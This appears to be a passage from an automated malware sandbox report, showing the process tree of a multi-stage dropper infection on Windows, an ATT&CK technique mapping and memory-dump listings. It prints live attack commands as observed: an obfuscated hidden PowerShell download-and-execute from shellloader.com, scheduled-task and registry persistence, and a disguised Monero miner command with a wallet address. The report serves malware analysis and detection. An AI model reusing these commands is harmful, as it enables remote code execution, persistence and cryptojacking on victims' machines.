  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 908
  2⤵
  - Program crash
  PID:2052
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 928
  2⤵
  - Program crash
  PID:2196
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1116
  2⤵
  - Program crash
  PID:4420

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu2102ff6cfe07c.exe
Thu2102ff6cfe07c.exe
1⤵
- Executes dropped EXE
PID:5064

C:\Users\Admin\AppData\Local\Temp\is-RN41D.tmp\Thu214aaca5625.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RN41D.tmp\Thu214aaca5625.tmp" /SL5="$301E0,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu214aaca5625.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1332
- C:\Users\Admin\AppData\Local\Temp\is-CES61.tmp\46807GHF____.exe
  "C:\Users\Admin\AppData\Local\Temp\is-CES61.tmp\46807GHF____.exe" /S /UID=burnerch2
  2⤵
  PID:3820
- - C:\Program Files\Google\NJOBJDUARW\ultramediaburner.exe
    "C:\Program Files\Google\NJOBJDUARW\ultramediaburner.exe" /VERYSILENT
    3⤵
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\is-3L69I.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-3L69I.tmp\ultramediaburner.tmp" /SL5="$302C0,281924,62464,C:\Program Files\Google\NJOBJDUARW\ultramediaburner.exe" /VERYSILENT
      4⤵
      PID:3556
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        
        PID:1316
- - C:\Users\Admin\AppData\Local\Temp\d4-1583a-e6e-232a2-a90501393f2f8\Sufyzhoraezha.exe
    "C:\Users\Admin\AppData\Local\Temp\d4-1583a-e6e-232a2-a90501393f2f8\Sufyzhoraezha.exe"
    3⤵
    PID:5904
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 1348
      4⤵
      PID:7108
- - C:\Users\Admin\AppData\Local\Temp\13-1023e-92a-03db8-1642620487495\Tynosoboxu.exe
    "C:\Users\Admin\AppData\Local\Temp\13-1023e-92a-03db8-1642620487495\Tynosoboxu.exe"
    3⤵
    PID:5376

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21568b0ab8.exe
Thu21568b0ab8.exe
1⤵
PID:4028
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  PID:1932
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    PID:4764
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:4876
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:5200
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:6080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:584
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:6504
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:5416
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:4180
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    PID:3360
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:5620
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 336
        5⤵
        Program crash
        
        PID:2192
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 316
        5⤵
        Program crash
        
        PID:6072
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 308
        5⤵
        Program crash
        
        PID:5664
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 456
        5⤵
        Program crash
        
        PID:3136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 628
        5⤵
        Program crash
        
        PID:1320
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 664
        5⤵
        Program crash
        
        PID:2844
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 604
        5⤵
        Program crash
        
        PID:5504
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 676
        5⤵
        Program crash
        
        PID:4060
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 716
        5⤵
        Program crash
        
        PID:5404
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 416
        5⤵
        Program crash
        
        PID:6628
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:2136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 808
      4⤵
      Program crash
      PID:6028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 844
      4⤵
      Program crash
      PID:5484
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 888
      4⤵
      Program crash
      PID:5360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 964
      4⤵
      Program crash
      PID:5964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 940
      4⤵
      Program crash
      PID:4136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 944
      4⤵
      Program crash
      PID:5244
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 1020
      4⤵
      Program crash
      PID:1376
- - C:\Users\Admin\AppData\Local\Temp\DVORAK.exe
    "C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"
    3⤵
    PID:2692
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2692 -s 1560
      4⤵
      Program crash
      PID:2488
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\3002.exe
      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
      4⤵
      PID:5852
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    PID:800
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    PID:5144

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21b9847cb6727.exe
Thu21b9847cb6727.exe
1⤵
- Executes dropped EXE
PID:304

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu2156de5489c19.exe
Thu2156de5489c19.exe
1⤵
- Executes dropped EXE
PID:3716
- C:\Users\Admin\AppData\Local\Temp\tmpBB76_tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpBB76_tmp.exe"
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\dllhost.exe
    dllhost.exe
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < Attesa.wmv
    3⤵
    PID:4648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:5192
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
        5⤵
        
        PID:3564
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        Adorarti.exe.com u
        5⤵
        
        PID:588
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        6⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        7⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        8⤵
        
        PID:6344
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        9⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        10⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        11⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        12⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        13⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        14⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        15⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        16⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        17⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        18⤵
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        19⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        20⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        21⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        22⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        23⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        24⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        25⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        26⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        27⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        28⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        29⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        30⤵
        
        PID:6568
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:6332

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu214aaca5625.exe
Thu214aaca5625.exe
1⤵
- Executes dropped EXE
PID:2592

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu2164f292a11ce.exe
Thu2164f292a11ce.exe
1⤵
PID:1572

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Executes dropped EXE
PID:1572
- C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Process spawned unexpected child process
  PID:4896
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    3⤵
    PID:5164
- C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Process spawned unexpected child process
  PID:2748
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    3⤵
    PID:636
- C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Process spawned unexpected child process
  PID:6644
- - C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    3⤵
    PID:4140

C:\Users\Admin\AppData\Local\Temp\is-A2BAE.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A2BAE.tmp\setup_2.tmp" /SL5="$601D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
1⤵
PID:1308
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
  2⤵
  PID:5512
- - C:\Users\Admin\AppData\Local\Temp\is-K4K6J.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-K4K6J.tmp\setup_2.tmp" /SL5="$701D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
    3⤵
    PID:5704
  - - C:\Users\Admin\AppData\Local\Temp\is-GM4EU.tmp\postback.exe
      "C:\Users\Admin\AppData\Local\Temp\is-GM4EU.tmp\postback.exe" ss1
      4⤵
      PID:2132
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        5⤵
        
        PID:5940
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        6⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        7⤵
        
        PID:4532
      - C:\Users\Admin\AppData\Local\Temp\mxPr3AXfA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mxPr3AXfA.exe"
        6⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        7⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        8⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        9⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        8⤵
        Creates scheduled task(s)
        
        PID:2176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4028
      - C:\Users\Admin\AppData\Local\Temp\aYsfdlnaQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aYsfdlnaQ.exe"
        6⤵
        
        PID:6296
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 624
        6⤵
        Program crash
        
        PID:5300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1292

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6348

C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
1⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\914A.exe
C:\Users\Admin\AppData\Local\Temp\914A.exe
1⤵
PID:4604

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6948
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 05115311FBA4109602C08378A3D0757B C
  2⤵
  PID:6356

C:\Users\Admin\AppData\Local\Temp\BCEF.exe
C:\Users\Admin\AppData\Local\Temp\BCEF.exe
1⤵
PID:7056
- C:\Users\Admin\AppData\Local\Temp\BCEF.exe
  C:\Users\Admin\AppData\Local\Temp\BCEF.exe
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\93df72ed-1aeb-4bba-82ce-bcb6b8019944" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:5924
- - C:\Users\Admin\AppData\Local\Temp\BCEF.exe
    "C:\Users\Admin\AppData\Local\Temp\BCEF.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\BCEF.exe
      "C:\Users\Admin\AppData\Local\Temp\BCEF.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:4192
    - - C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build2.exe
        
        "C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build2.exe"
        5⤵
        
        PID:6348
      - C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build2.exe
        
        "C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build2.exe"
        6⤵
        
        PID:6316
    - - C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build3.exe
        
        "C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build3.exe"
        5⤵
        
        PID:6012
      - C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build3.exe
        
        "C:\Users\Admin\AppData\Local\ab17afc7-7fe3-40ac-b94f-bc818b632c8a\build3.exe"
        6⤵
        
        PID:6920

C:\Users\Admin\AppData\Local\Temp\E086.exe
C:\Users\Admin\AppData\Local\Temp\E086.exe
1⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\1CA.exe
C:\Users\Admin\AppData\Local\Temp\1CA.exe
1⤵
PID:6964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/372-233-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/372-251-0x0000000007550000-0x0000000007551000-memory.dmp

Filesize
4KB

Download
memory/372-254-0x00000000088B0000-0x00000000088B1000-memory.dmp

Filesize
4KB

Download
memory/372-277-0x0000000008C10000-0x0000000008C11000-memory.dmp

Filesize
4KB

Download
memory/372-203-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/372-245-0x00000000082E0000-0x00000000082E1000-memory.dmp

Filesize
4KB

Download
memory/372-272-0x00000000081D0000-0x00000000081D1000-memory.dmp

Filesize
4KB

Download
memory/372-235-0x0000000007970000-0x0000000007971000-memory.dmp

Filesize
4KB

Download
memory/372-209-0x00000000052D2000-0x00000000052D3000-memory.dmp

Filesize
4KB

Download
memory/372-202-0x00000000079A0000-0x00000000079A1000-memory.dmp

Filesize
4KB

Download
memory/372-247-0x0000000008270000-0x0000000008271000-memory.dmp

Filesize
4KB

Download
memory/372-193-0x0000000005210000-0x0000000005211000-memory.dmp

Filesize
4KB

Download
memory/372-316-0x0000000008B40000-0x0000000008B41000-memory.dmp

Filesize
4KB

Download
memory/372-250-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/800-327-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/984-356-0x000001F4D0660000-0x000001F4D06D4000-memory.dmp

Filesize
464KB

Download
memory/1304-253-0x000000001B6C0000-0x000000001B6C1000-memory.dmp

Filesize
4KB

Download
memory/1304-208-0x0000000000640000-0x000000000065C000-memory.dmp

Filesize
112KB

Download
memory/1304-224-0x000000001AE30000-0x000000001AE32000-memory.dmp

Filesize
8KB

Download
memory/1304-179-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/1304-218-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/1304-197-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/1308-338-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1332-214-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1532-169-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1572-258-0x0000000000400000-0x0000000002B5B000-memory.dmp

Filesize
39.4MB

Download
memory/1572-255-0x00000000001E0000-0x00000000001E9000-memory.dmp

Filesize
36KB

Download
memory/1676-303-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/1676-314-0x0000000004F94000-0x0000000004F96000-memory.dmp

Filesize
8KB

Download
memory/1676-270-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/1676-276-0x0000000007320000-0x0000000007321000-memory.dmp

Filesize
4KB

Download
memory/1676-291-0x0000000007820000-0x0000000007821000-memory.dmp

Filesize
4KB

Download
memory/1676-285-0x0000000004F93000-0x0000000004F94000-memory.dmp

Filesize
4KB

Download
memory/1676-269-0x00000000047C0000-0x00000000047DF000-memory.dmp

Filesize
124KB

Download
memory/1676-257-0x0000000002B70000-0x0000000002CBA000-memory.dmp

Filesize
1.3MB

Download
memory/1676-278-0x0000000004F92000-0x0000000004F93000-memory.dmp

Filesize
4KB

Download
memory/1676-300-0x0000000004E00000-0x0000000004E01000-memory.dmp

Filesize
4KB

Download
memory/1676-286-0x0000000004A20000-0x0000000004A3E000-memory.dmp

Filesize
120KB

Download
memory/1676-311-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/1676-267-0x0000000000400000-0x0000000002B6E000-memory.dmp

Filesize
39.4MB

Download
memory/1932-262-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/2136-367-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/2232-223-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/2232-236-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
